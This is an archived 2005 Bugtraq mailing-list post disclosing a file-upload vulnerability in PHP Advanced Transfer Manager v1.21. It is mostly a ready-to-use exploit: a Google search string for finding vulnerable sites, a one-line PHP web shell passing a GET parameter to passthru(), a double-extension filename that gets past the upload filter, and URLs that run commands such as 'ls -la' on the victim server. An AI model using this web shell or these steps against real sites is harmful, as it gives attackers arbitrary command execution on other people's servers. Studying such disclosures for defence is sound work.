[38757] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

PHP Advanced Transfer Manager v1.21

daemon@ATHENA.MIT.EDU (tjomi4@gmail.com)
Fri May 6 14:04:28 2005

Date: Fri, 6 May 2005 11:43:15 +0300
From: tjomi4@gmail.com
Reply-To: tjomi4@gmail.com
Message-ID: <1214871813.20050506114315@gmail.com>
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com,
        support@securitylab.ru, <vuln@security.nnov.ru>, <tjomi4@gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88 
.88.888o88..888oooooo.....888     
.88...8888.........888....888     
o88o....88.o88oooo888....o888o    
********************************
**** Network security team *****
********* nst.void.ru **********
********************************
* Title: PHP Advanced Transfer Manager v1.21
* Bug found by: nst
* Date: 06.05.2005
********************************

Owner: phpatm.free.fr
Google: allintitle:PHP Advanced Transfer Manager

Status: Critical

*** File upload.

1. Register :: http://victim/register.php
2. Login :: http://victim/login.php


Create file:
nst.php.ns

<pre>
<?
passthru($_GET['nst']);
?>

Then upload, and go to http://victim/files/nst.php.ns?nst=ls -la

or

<?
passthru($_GET['nst']);
?>

Then upload, and go to http://victim/files/nst.php.ns?nst=http://your/file.txt

home	help	back	first	fref	pref	prev	next	nref	lref	last	post